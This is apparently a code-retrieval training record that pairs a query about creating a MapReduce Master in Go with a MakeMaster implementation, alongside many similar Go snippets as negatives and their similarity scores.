<-mr.registerChannel\n\t\t\t\tfmt.Printf(\"new worker arrived name = %s\\n\", worker)\n\t\t\t\tif worker == \"done\" {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tgo func() {\n\t\t\t\t\tfor {\n\t\t\t\t\t\tt := atomic.AddInt32(&i, 1)\n\t\t\t\t\t\tfmt.Printf(\"reduce new worker = %s, t = %d\\n\", worker, t)\n\t\t\t\t\t\tif t >= int32(ntasks) {\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\t\t\t\t\t\t// if t == int32(ntasks) {\n\t\t\t\t\t\t// \tmr.registerChannel <- \"done\"\n\t\t\t\t\t\t// \tbreak\n\t\t\t\t\t\t// }\n\t\t\t\t\t\tfile := mr.files[t]\n\t\t\t\t\t\targs := DoTaskArgs{\"test\", file, phase, int(t), nios}\n\t\t\t\t\t\t//rpc worker possible have error\n\t\t\t\t\t\tif !call(worker, \"Worker.DoTask\", args, new(struct{})) {\n\t\t\t\t\t\t\tt = atomic.AddInt32(&i, -1)\n\t\t\t\t\t\t\t//recall after one seconds\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\twg.Done()\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}()\n\t\t\t}\n\t\t}()\n\t\t//use previous worker\n\t\tfor _, val := range mr.workers {\n\t\t\t// fmt.Printf(\"reduce worker=%s\\n\", val)\n\t\t\tgo func(val string) {\n\t\t\t\tfor {\n\t\t\t\t\t// fmt.Printf(\"reduce4 worker=%s\\n\", val)\n\t\t\t\t\tt := atomic.AddInt32(&i, 1)\n\t\t\t\t\tif t >= int32(ntasks) {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tfile := mr.files[t]\n\t\t\t\t\targs := DoTaskArgs{\"test\", file, phase, int(t), nios}\n\t\t\t\t\t//rpc worker possible have error\n\t\t\t\t\tif !call(val, \"Worker.DoTask\", args, new(struct{})) {\n\t\t\t\t\t\tt = atomic.AddInt32(&i, -1)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t} else {\n\t\t\t\t\t\twg.Done()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}(val)\n\t\t}\n\n\t\twg.Wait()\n\t\tmr.registerChannel <- \"done\"\n\t}\n\n\tfmt.Printf(\"Schedule: %v phase done\\n\", phase)\n}", "func (m *HeavySyncMock) ResetFinished() bool {\n\t// if expectation series were set then invocations count should be equal to expectations count\n\tif len(m.ResetMock.expectationSeries) > 0 {\n\t\treturn atomic.LoadUint64(&m.ResetCounter) == uint64(len(m.ResetMock.expectationSeries))\n\t}\n\n\t// if main expectation was set then invocations count should be greater than zero\n\tif m.ResetMock.mainExpectation != nil {\n\t\treturn atomic.LoadUint64(&m.ResetCounter) > 0\n\t}\n\n\t// if func was set then invocations count should be greater than zero\n\tif m.ResetFunc != nil {\n\t\treturn atomic.LoadUint64(&m.ResetCounter) > 0\n\t}\n\n\treturn true\n}", "func (p *CassandraClustersCreateUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DatabaseAccountsOfflineRegionPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (j *Job) shouldRun() bool {\n\treturn time.Now().Unix() >= j.nextRun.Unix()\n}", "func (this *DeployLock) finish() {\n\tthis.mutex.Lock()\n\tthis.numFinished++\n\tthis.mutex.Unlock()\n}", "func (f *foreman) Start() {\n\tjobsChan := make(chan int, 100)\n\tresChan := make(chan string, 100)\n\tisCompletedChan := make(chan bool)\n\n\tfor w := 0; w < f.workers; w++ {\n\t\tgo worker(w, jobsChan, resChan)\n\t}\n\n\tfor j := 0; j < f.jobs; j++ {\n\t\tjobsChan <- j\n\t}\n\tclose(jobsChan)\n\n\tgo checkWork(f.jobs, resChan, isCompletedChan)\n\n\t<-isCompletedChan\n\tclose(resChan)\n\n\tfmt.Println(\"all jobs are completed\")\n}", "func (p *CassandraClustersStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (m *Master) TaskCompleted(args *Message, reply *NoArgs) error {\n\tswitch args.TaskType {\n\n\tcase \"map\":\n\t\t// fmt.Println(\"before map finish lock\")\n\t\tm.mu.Lock()\n\t\t// set job status to done\n\t\tm.mapState[args.TaskNum].Value = \"completed\"\n\t\t// add the file created to the list of reduceJobs\n\t\tfor _, f := range args.Filenames {\n\t\t\tn := findN(f)\n\t\t\tm.reduceJobs[n] = append(m.reduceJobs[n], f)\n\t\t}\n\n\t\t// check: by finishing this map task\n\t\t// are all map tasks compeleted\n\t\tisCompleted := true\n\t\tfor _, kv := range m.mapState {\n\t\t\tif kv.Value != \"completed\" {\n\t\t\t\tisCompleted = false\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tm.mapDone = isCompleted\n\t\tm.mu.Unlock()\n\t\t// fmt.Println(\"after map finish lock\")\n\tcase \"reduce\":\n\n\t\tm.mu.Lock()\n\t\t// set job status to done\n\t\tm.reduceState[args.TaskNum] = \"completed\"\n\n\t\t// check: by finishing this reduce task\n\t\t// are all reduce tasks compeleted\n\t\tisCompleted := true\n\t\tfor _, value := range m.reduceState {\n\t\t\tif value != \"completed\" {\n\t\t\t\tisCompleted = false\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif isCompleted {\n\t\t\tm.removeIntermediateFiles()\n\t\t}\n\t\tm.reduceDone = isCompleted\n\t\tm.mu.Unlock()\n\t}\n\treturn nil\n}", "func (p *DatabaseAccountsOnlineRegionPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DeploymentsGenerateThreadDumpPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (i *UploadShrinker) Done() bool {\n\treturn i.chunk > i.total\n}", "func (p *CassandraClustersClientUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraDataCentersClientUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersInvokeCommandPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (cs cmdStatus) isDone() bool {\n\treturn cs&(1<<12 /*busy*/) == 0\n}", "func (m *Master) Run() int {\n\tm.Build()\n\treturn m.Start()\n}", "func (p *GremlinResourcesCreateUpdateGremlinDatabasePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DatabaseAccountsRegenerateKeyPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (t *Tileset) CheckJobStatus() error {\n\tfmt.Println(\"Awaiting job completion. This may take some time...\")\n\tfor {\n\t\tstatusResponse := &StatusResponse{}\n\t\tres, err := t.base.SimpleGET(t.postURL() + \"/status\")\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tjson.Unmarshal(res, statusResponse)\n\t\tif statusResponse.Status == \"failed\" {\n\t\t\tfmt.Println(\"Job failed\")\n\t\t\treturn nil\n\t\t}\n\t\tif statusResponse.Status == \"success\" {\n\t\t\tfmt.Println(\"Job complete\")\n\t\t\treturn nil\n\t\t}\n\t\tfmt.Println(statusResponse.Status)\n\t\ttime.Sleep(5 * time.Second)\n\n\t}\n\n}", "func (p *DomainsUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *DeleteReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *DatabaseAccountsUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *NotebookWorkspacesRegenerateAuthTokenPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (s *JobStatus) Done() bool {\n\treturn s.State == Done\n}", "func (s *JobStatus) Done() bool {\n\treturn s.State == Done\n}" ]
[ "0.7823017", "0.76430684", "0.761561", "0.74849814", "0.7421957", "0.7361364", "0.73418754", "0.7336742", "0.730617", "0.7304654", "0.72612065", "0.72489536", "0.7237784", "0.7212441", "0.7203896", "0.71987164", "0.7190169", "0.7184905", "0.71776134", "0.71732163", "0.71365404", "0.7119928", "0.70886856", "0.7014535", "0.700787", "0.6935697", "0.6915297", "0.6901854", "0.6886913", "0.6850366", "0.6797319", "0.6615807", "0.66049135", "0.6413519", "0.6321555", "0.63074845", "0.62046635", "0.60425", "0.60135627", "0.6013147", "0.60077953", "0.59884506", "0.59746677", "0.59709364", "0.5965993", "0.59549874", "0.5902606", "0.58900243", "0.58851427", "0.5883504", "0.58726805", "0.5844602", "0.58341813", "0.5823982", "0.58160275", "0.5807777", "0.5787979", "0.57607746", "0.57511675", "0.5737547", "0.57313913", "0.5723525", "0.5698703", "0.56944716", "0.5683076", "0.56825334", "0.5646594", "0.5646251", "0.56335133", "0.56185365", "0.5617544", "0.5615362", "0.5613964", "0.56096905", "0.5606886", "0.55548954", "0.5554755", "0.5548026", "0.5546387", "0.5527664", "0.55197984", "0.5511037", "0.55082124", "0.5499017", "0.54964924", "0.5490686", "0.54865533", "0.54849565", "0.5483579", "0.54783237", "0.54665", "0.5466406", "0.5465664", "0.5465317", "0.54646415", "0.54610854", "0.5459905", "0.54563147", "0.5453023", "0.5453023" ]
0.6820809
30
create a Master. main/mrmaster.go calls this function. nReduce is the number of reduce tasks to use.
func MakeMaster(files []string, nReduce int) *Master { m := Master{} // Your code here. //record each file as a task mapTasks := []MapTask{} j := 0 for _, filename := range files { mapTasks = append(mapTasks, MapTask{filename, j, 0, 0}) j++ } m.mapTasks = mapTasks m.nextmaptask = 0 //generate nReduce reduce tasks each in an intermediate file reduceTasks := []ReduceTask{} i := 0 for i < nReduce { reduceTasks = append(reduceTasks, ReduceTask{INTERPREFIX + strconv.Itoa(i), i, 0, 0}) i++ } m.reduceTasks = reduceTasks m.nextreducetask = 0 m.nReduce = nReduce m.done = false m.server() return &m }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func MakeMaster(files []string, nReduce int) *Master {\n\t// TODO: figure out better place to setup log flags\n\tlog.SetFlags(log.Ltime) // | log.Lshortfile)\n\n\tm := Master{nReduce: nReduce}\n\n\t// Your code here.\n\t// Generating Map tasks\n\tlogger.Debug(\"Generating Map tasks...\")\n\tfor i, fn := range files { // M map tasks\n\t\tm.taskCount++\n\t\ttaskId := fmt.Sprintf(\"map-task-%d\", i)\n\t\ttaskInfo := TaskInfo{taskId, IDLE, \"\", fn, \"\", -1}\n\t\tm.TaskSummary.Store(taskId, taskInfo)\n\t}\n\t// Generating Reduce tasks\n\tlogger.Debug(\"Generating Reduce tasks...\")\n\tfor i := 0; i < nReduce; i++ { // R reduce tasks\n\t\tm.taskCount++\n\t\ttaskId := fmt.Sprintf(\"reduce-task-%d\", i)\n\t\ttaskInfo := TaskInfo{taskId,IDLE, \"\", \"\", \"\", -1}\n\t\tm.TaskSummary.Store(taskId, taskInfo)\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tfmt.Printf(\"Making Master. nReduce = %d\\n\", nReduce)\n\n\tm := Master{}\n\tm.nReduce = nReduce\n\tm.mapDone = false\n\tm.reduceDone = false\n\n\t// Create map tasks from files\n\tfor i, filename := range files {\n\t\tfmt.Printf(\"Creating task for file %v\\n\", filename)\n\t\ttask := MapTask{}\n\t\ttask.num = i\n\t\ttask.filename = filename\n\t\ttask.state = Idle\n\t\tm.mapTasks = append(m.mapTasks, task)\n\t}\n\n\t// Create reduce tasks from param\n\ti := 0\n\tfor i < nReduce {\n\t\ttask := ReduceTask{}\n\t\ttask.num = i\n\t\ttask.state = Idle\n\t\tm.reduceTasks = append(m.reduceTasks, task)\n\t\ti += 1\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t//os.RemoveAll(Dir)\n\tm := Master{}\n\tm.files = files\n\tm.isFinished_ = false\n\tm.completedMapCount = -1\n\tm.completeReduceCount = -1\n\tm.mutex = sync.Mutex{}\n\t//init mapTask\n\tif len(files) != 8 {\n\t\tos.Exit(-1)\n\t}\n\tfor index, _ := range files {\n\t\ttask := Task{MAP,false,false,index}\n\t\tm.mapTasks = append(m.mapTasks,task)\n\t}\n\tfmt.Printf(\"init files %v \\n\",len(files))\n\tfor i := 0; i < nReduce; i++ {\n\t\ttask := Task{REDUCE,false,false,i}\n\t\tm.reduceTasks = append(m.reduceTasks, task)\n\t}\n\t//os.Mkdir(Dir,os.ModePerm)\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.M = &MapTasks{\n\t\tTaskQueue: []*MapTask{},\n\t\tTaskQueuePtr: 0,\n\t\tToDo : 0,\n\t\tMu: sync.Mutex{},\n\t}\n\n\tm.R = &ReduceTasks{\n\t\tTaskQueue: []*ReduceTask{},\n\t\tTaskQueuePtr: 0,\n\t\tToDo : 0,\n\t\tMu: sync.Mutex{},\n\t}\n\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.R.TaskQueue = append(\n\t\t\tm.R.TaskQueue,\n\t\t\t&ReduceTask{FilePaths: make(map[string]bool)})\n\t}\n\n\tfor _, file := range files {\n\t\tm.M.TaskQueue = append(m.M.TaskQueue, &MapTask{\n\t\t\tFilePath: file,\n\t\t\tState: ToStart,\n\t\t})\n\t\tm.M.ToDo++\n\t}\n\n\tm.R.ToDo = nReduce\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t// Your code here.\n\tm := Master{\n\t\tmutex: sync.Mutex{},\n\t\tstate: Initializing,\n\t\tmapTasks: []Task{},\n\t\treduceTasks: []Task{},\n\t\tnumOfMap: len(files),\n\t\tnumOfReduce: nReduce,\n\t}\n\n\tfor i, file := range files {\n\t\tm.mapTasks = append(m.mapTasks, Task{\n\t\t\tId: i,\n\t\t\tTaskType: MapTask,\n\t\t\tState: UnScheduled,\n\t\t\tFilename: file,\n\t\t\tNumsOfMap: m.numOfMap,\n\t\t\tNumsOfReduce: m.numOfReduce,\n\t\t})\n\t}\n\n\tfor i := 0; i < nReduce; i ++ {\n\t\tm.reduceTasks = append(m.reduceTasks, Task{\n\t\t\tId: i,\n\t\t\tTaskType: ReduceTask,\n\t\t\tState: UnScheduled,\n\t\t\tFilename: \"\",\n\t\t\tNumsOfMap: m.numOfMap,\n\t\t\tNumsOfReduce: m.numOfReduce,\n\t\t})\n\t}\n\n\tm.state = MapPhase\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\tm.M = len(files)\n\tm.R = nReduce\n\n\tm.MapTasks = files\n\tm.IsIdleMaps = make([]int, m.M)\n\n\tm.ReduceTasks = make([][]string, m.R)\n\tm.IsIdleReduces = make([]int, m.R)\n\n\n\tm.MapTasksTime = make([]int64, m.M)\n\tm.ReduceTasksTime = make([]int64, m.R)\n\n\tfor i := 0; i < m.R; i += 1 {\n\t\tm.ReduceTasks[i] = make([]string, m.M)\n\t\tfor j := 0; j < m.M; j += 1 {\n\t\t\tname := \"mr-\" + strconv.Itoa(j) + \"-\" + strconv.Itoa(i)\n\t\t\tm.ReduceTasks[i][j] = name\n\t\t}\n\t}\n\n\n\t// Your code here.\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t// Your code here.\n\tfileCount := len(files)\n\tmapTasks := make([]mapTask, len(files))\n\treduceTasks := make([]reduceTask, nReduce)\n\tfor i := 0; i < fileCount; i++ {\n\t\tmapTasks[i] = mapTask{\n\t\t\tfile: files[i],\n\t\t\ttaskID: i,\n\t\t\tstate: taskUnstarted,\n\t\t}\n\t}\n\tfor i := 0; i < nReduce; i++ {\n\t\treduceTasks[i] = reduceTask{\n\t\t\ttaskID: i,\n\t\t\tstate: taskUnstarted,\n\t\t}\n\t}\n\tm := Master{\n\t\tmapTasks: mapTasks,\n\t\treduceTasks: reduceTasks,\n\t\tnReduce: nReduce,\n\t}\n\tcleanIntermediateFiles()\n\tgo m.retryTaskLoop()\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tm.nMap = len(files)\n\tm.ReduceOutNum = nReduce\n\tm.nReduce = 0\n\t// Your code here.\n\t// init task\n\tm.mapTasks = make([]Task, 0)\n\tm.reduceTasks = make([]Task, 0)\n\tm.reduceTaskFileLists = make([][]string, m.ReduceOutNum)\n\tm.hasGenerateReduceTasks = false\n\tinitMapTaskNum := len(files)\n\tfor i := 0; i < initMapTaskNum; i++ {\n\t\tm.mapTasks = append(m.mapTasks, Task{Id: i, State: GENERATED, TaskKind: MAPTASK, MapTaskFile: files[i]})\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tdelete()\n\tm := Master {\n\t\tmu: sync.RWMutex{},\n\t\tM: len(files),\n\t\tR: nReduce,\n\t\tidleTasks: [2]chan Task{make(chan Task, len(files)), make(chan Task, nReduce)},\n\t\tinProgress: [2]map[Task]bool{make(map[Task]bool), make(map[Task]bool)},\n\t\tcompletedTasks: [2]chan Task{make(chan Task, len(files)), make(chan Task, nReduce)},\n\t}\n\n\n\t// Your code here.\n\tfor i, file := range files {\n\t\ttask := Task{Type: \"map\", Filename: file, TaskNum: i, NReduce: nReduce}\n\t\tm.idleTasks[0] <- task\n\t}\n\n\tfor i:=0; i<nReduce ; i++ {\n\t\tm.idleTasks[1] <- Task{\n\t\t\tType: \"reduce\",\n\t\t\tFilename: \"\",\n\t\t\tTaskNum: i,\n\t\t\tNReduce: nReduce,\n\t\t}\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tMnum: len(files),\n\t\tRnum: nReduce,\n\t\tJobManager: &JobManager{\n\t\t\tCounter: 0,\n\t\t\tJobs: make(chan *Job, len(files)),\n\t\t\tRShuffleChan: make(chan string, len(files)), // TODO: 是否可以优化\n\t\t\tJobsMonitor: make(map[uint64]*Job),\n\t\t},\n\t\tWorkerManager: &WorkerManager{\n\t\t\tCounter: 0,\n\t\t},\n\t}\n\n\tfor _, f := range files {\n\t\tjob := &Job{\n\t\t\tType: 0,\n\t\t\tId: atomic.AddUint64(&m.JobManager.Counter, 1),\n\t\t\tRNum: nReduce,\n\t\t\tSource: f,\n\t\t}\n\t\tm.JobManager.Jobs <- job\n\t}\n\n\tgo m.ShuffleReduceJobs()\n\tgo m.MonitorJobs()\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tsources := make([][]string, len(files)+1) // 多出一行保存完成状态\n\tfor i := 0; i < len(sources); i++ {\n\t\tsources[i] = make([]string, nReduce)\n\t}\n\tm.taskPhase = MapPhase\n\tm.nextWorkerId = uint64(0)\n\tm.nReduce = nReduce\n\tm.nMap = len(files)\n\tm.status = make([]bool, nReduce)\n\tm.TaskPool = &TaskPool{Pool: make(chan *Task, len(files))}\n\t\n\tm.mapTasks = make([]Task, len(files))\n\tm.reduceTasks = make([]Task, nReduce)\n\n\tdispatcher = &Dispatcher{\n\t\tTimeOut: 10 * time.Second,\n\t\tM: &m,\n\t\tCleanWorkerChan: make(chan uint64, len(files)),\n\t\tReduceChan: \t\t make(chan uint64, nReduce),\n\t}\n\tdispatcher.run()\n\t// 初始化map任务\n\t\n\tfor num, file := range files {\n\t\tm.mapTasks[num] = Task{\n\t\t\tStatus: NotStarted,\n\t\t\tType: MapTask, // 0 map 任务 1 reduce 任务 2 shut down 3 retry\n\t\t\tConf: &TaskConf{File: []string{file}, TaskId: uint64(num)},\n\t\t}\n\t\tm.TaskPool.Pool <- &m.mapTasks[num]\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.mu = sync.Mutex{}\n\tm.nReduce = nReduce\n\tm.files = files\n\t\n\tif nReduce > len(files) {\n\t\tm.taskCh = make(chan Task, nReduce)\n\t} else {\n\t\tm.taskCh = make(chan Task, len(m.files))\n\t}\n\n\tm.initMapTasks()\n\tgo m.tickSchedule()\n\n\tm.server()\n\tdisplay(\"master init...\")\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\r\n\tm := Master{}\r\n\r\n\t// Your code here.\r\n\tm.nextMapTaskNo = 1\r\n\tm.nextReduceTaskNo = 1\r\n\tm.inputFiles = make(chan string, 100)\r\n\tm.mapTasks = make(map[int]string)\r\n\tm.mapFinish = make(map[string]int)\r\n\tm.failedMapTaskNo = make(map[int]int)\r\n\tm.reduceTasks = make(map[int][]string)\r\n\tm.inputIntermediateFiles = make(chan []string, 100)\r\n\tm.done = make(chan bool)\r\n\tm.reduceFinish = make(map[int]bool)\r\n\tm.mapIntermediateFiles = make([][]string, 0)\r\n\tm.taskPhase = 0\r\n\tm.nReduce = nReduce\r\n\r\n\tfor _, file := range files {\r\n\t\tm.inputFiles <- file\r\n\t\tm.totalInputFiles++\r\n\t}\r\n\r\n\tm.server()\r\n\t// log.Println(\"-----Server Started------\")\r\n\treturn &m\r\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{nReducers: nReduce, MTasks: Tasks{}, RTasks: Tasks{}, WStatus: make(map[int]string), IntermediateFiles: make(map[int][]string)}\n\n\tfor idx, file := range files {\n\t\tif idx == 0 {\n\t\t\tm.MapTaskNumber = idx\n\t\t}\n\t\tm.MTasks[file] = &TaskInfo{status: IDLE, StartTs: -1, EndTs: -1}\n\t}\n\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.RTasks[i] = &TaskInfo{status: IDLE, StartTs: -1, EndTs: -1}\n\t}\n\tm.StartTaskMonitor()\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.mapTasks = files\n\tm.reduceTasks = nReduce\n\tm.status = MapStage\n\tm.reduceFinished = 0\n\tm.mapFinished = 0\n\tm.mapInProgress = make(map[int]void)\n\tm.reduceInProgress = make(map[int]void)\n\tfor i := 0; i < len(files); i++ {\n\t\tm.mapNotAssigned.PushBack(i)\n\t}\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.reduceNotAssigned.PushBack(i)\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tNMap: len(files),\n\t\tNReduce: nReduce,\n\t\tfiles: files,\n\t\tMapTask: make(map[int]*TaskInfo),\n\t\tReduceTask: make(map[int]*TaskInfo),\n\t\tDoneMapTask: []int{},\n\t\tDoneReduceTask: []int{},\n\t\tExitChan: make(chan int),\n\t}\n\t// Your code here.\n\tfor idx, _ := range files {\n\t\tm.TodoMapTask = append(m.TodoMapTask, idx)\n\t}\n\tfor idx := 0; idx < nReduce; idx++ {\n\t\tm.TodoReduceTask = append(m.TodoReduceTask, idx)\n\t}\n\tgo m.countTime()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, NumReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.NumMap = len(files)\n\tm.NumReduce = NumReduce\n\tm.MapFinish = false\n\tm.ReduceFinish = false\n\tfor index, file := range files {\n\t\tvar tempTask MapReduceTask\n\t\ttempTask.NumMap = m.NumMap\n\t\ttempTask.NumReduce = m.NumReduce\n\t\ttempTask.TaskType = \"Map\"\n\t\ttempTask.TaskStatus = \"Unassigned\"\n\t\ttempTask.TaskNum = index\n\t\ttempTask.MapFile = file\n\t\tm.MapTasks = append(m.MapTasks, tempTask)\n\t}\n\tfor i := 0; i < m.NumReduce; i++ {\n\t\tvar tempTask MapReduceTask\n\t\ttempTask.NumMap = m.NumMap\n\t\ttempTask.NumReduce = m.NumReduce\n\t\ttempTask.TaskType = \"Reduce\"\n\t\ttempTask.TaskStatus = \"Unassigned\"\n\t\ttempTask.TaskNum = i\n\t\tfor j := 0; j < m.NumMap; j++ {\n\t\t\ttempTask.ReduceFiles = append(tempTask.ReduceFiles, intermediateFilename(j, i))\n\t\t}\n\t\tm.ReduceTasks = append(m.ReduceTasks, tempTask)\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tmaptasks = make(chan MapTask, len(files))\n\treducetasks = make(chan int, nReduce)\n\tm.mapTaskStatus = make(map[string]int, len(files))\n\tm.reduceTaskStatus = make(map[int]int, nReduce)\n\tfor index, file := range files {\n\t\tm.mapTaskStatus[file] = NotStarted\n\t\tmapTask := MapTask{}\n\t\tmapTask.index = index\n\t\tmapTask.filename = file\n\t\tmaptasks <- mapTask\n\t}\n\n\tm.inputFiles = files\n\tm.nReduce = nReduce\n\tm.intermediateFiles = make([][]string, nReduce)\n\tm.RWMutexLock = new(sync.RWMutex)\n\tm.server()\n\treturn &m\n}", "func New(files []string, nReduce int) *Master {\n\tmapTasks := map[string]model.Task{}\n\tfor _, f := range files {\n\t\tt := model.Task{\n\t\t\tFiles: []string{f},\n\t\t\tNReduce: nReduce,\n\t\t\tType: model.Map,\n\t\t\tStatus: pending,\n\t\t}\n\t\t// Sanitize filename.\n\t\tmapTasks[path.Base(f)] = t\n\t}\n\n\t// Create empty reduce tasks.\n\treduceTasks := map[string]model.Task{}\n\tfor i := 1; i <= nReduce; i++ {\n\t\treduceTasks[toString(i)] = model.Task{\n\t\t\tType: model.Reduce,\n\t\t\tStatus: pending,\n\t\t}\n\t}\n\n\treturn &Master{\n\t\tmapTasks: mapTasks,\n\t\treduceTasks: reduceTasks,\n\t\tdone: make(chan struct{}),\n\t\tmutex: sync.RWMutex{},\n\t\ttimeout: make(chan struct{ taskName, taskType string }),\n\t\tphase: model.Map,\n\t}\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.ReduceTask = make(map[int]*ReduceTaskStatus)\n\tm.MapTask = make(map[int]*MapTaskStatus)\n\tm.inputFileList = files\n\tm.nReduce = nReduce\n\tm.State = Map\n\tfor i, _ := range files {\n\t\tm.MapTask[i] = &MapTaskStatus{\n\t\t\tStatus: UnInit,\n\t\t}\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.nReduce = nReduce\n\tm.files = files\n\tm.nMap = len(files)\n\tm.mapStates = make([]mapState, m.nMap)\n\tm.reduceStates = make([]reduceState, m.nReduce)\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tnReduce: nReduce,\n\t\tmapTask: []Task{},\n\t\tmasterState: newMaster,\n\t\tend: false,\n\t}\n\n\t// Your code here.\n\n\tfor i, file := range files {\n\t\tm.mapTask = append(m.mapTask, Task{\n\t\t\tType_: mapTask,\n\t\t\tId: i,\n\t\t\tFilename: file,\n\t\t\tState: initialState,\n\t\t\tNReduce: m.nReduce,\n\t\t})\n\t}\n\n\tgo m.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tm.inputFiles = files\n\tm.nReduceTasks = nReduce\n\tm.init()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tm.files = files\n\tm.record = map[string]*record{}\n\tm.tasks = map[int][]*record{}\n\tm.reduceTasks = map[int]*record{}\n\tm.nReduce = nReduce\n\tm.phase = TaskMapType\n\t// Your code here.\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.init()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tinputFiles: files,\n\t\tnReduce: nReduce,\n\t\tallFiles: files,\n\t\tisMapCompleted: false,\n\n\t\ttoStartMaps: makeRange(0, len(files)-1),\n\t\tinProgressMaps: make(map[int]bool),\n\t\tcompletedMaps: make(map[int]bool),\n\n\t\tinProgressReduces: make(map[int]bool),\n\t\tcompletedReduces: make(map[int]bool),\n\t}\n\n\t// Your code here.\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tlog.SetFlags(log.Ltime | log.Lshortfile)\n\n\tm := Master{}\n\tm.initMapTask(files, nReduce)\n\tm.server()\n\tgo m.CheckTimeout()\n\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tnMap := len(files)\n\tm := NewMaster(files, max(nMap, nReduce), masterTimeout, nReduce)\n\n\t// Your code here.\n\tm.server()\n\treturn m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.files = files\n\tm.nReduce = nReduce\n\n\tm.todoMapTask = make(map[int]int64)\n\tfor i, _ := range m.files {\n\t\tm.todoMapTask[i] = 0\n\t}\n\n\tm.todoReduceTask = make(map[int]int64)\n\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.todoReduceTask[i] = 0\n\t}\n\n\t// 清理其他任务的中间文件\n\tClearDirtyFile()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.mMap = len(files)\n\tm.nReduce = nReduce\n\tm.files = files\n\n\tm.remainReduceCount = nReduce\n\tm.remainMapCount = m.mMap\n\tm.maps = make([]mapUnit, m.mMap)\n\tm.reduces = make([]reduceUnit, nReduce)\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(filePath string, nReduce int) *Master {\n\n\tWriteDataIntoLists(filePath)\n\n\t// fmt.Println(courseList)\n\t// fmt.Println(roomList)\n\t// fmt.Println(timeSlotList)\n\n\tvar firstGeneration []Chrom\n\tfirstGeneration = CreateFirstGeneration(courseList, timeSlotList, 